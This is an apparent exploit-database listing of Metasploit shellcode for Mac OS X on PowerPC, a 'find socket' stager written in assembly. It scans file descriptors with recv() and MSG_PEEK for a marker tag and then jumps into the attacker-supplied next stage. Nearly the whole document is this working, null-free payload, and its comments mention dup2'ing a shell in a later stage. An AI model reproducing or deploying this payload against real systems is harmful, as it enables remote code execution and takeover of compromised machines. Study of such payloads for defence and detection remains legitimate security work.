OSX/PPC - Stager Sock Find MSG_PEEK Shellcode

2009-01-01 11:05:06

;;
;
; Name: stager_sock_find_peek
; Qualities: Null-Free
; Platforms: MacOS X / PPC
; Authors: H D Moore < hdm [at] metasploit.com >
; Version: $Revision: 1.1 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; This payload will recv() downward until the read
; data contains the search tag (0xXXXX1337). Once the
; tag is located, it will jump into the payload. The
; recv() call is passed the MSG_PEEK flag, the stage
; will need to flush the recv() queue before doing
; something like dup2'ing a shell.
;
;;

.globl _main
.text
_main:
li r29, 0xfff
li r30, 0xfff
addic. r28, r29, -0xfff +1

findsock:
subf. r30, r28, r30
blt _main

subi r0, r29, 0xfff - 102
mr r3, r30
subi r4, r1, 4104
li r5, 4095
subi r6, r29, 0xfff - 0x82
.long 0x44ffff02
xor. r6, r6, r6

lhz r27, -4104(r1)
cmpwi r27, 0x1337
bne findsock

gotsock:
subi r4, r1, 4100
mtctr r4
blectr
xor. r6, r6, r6

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.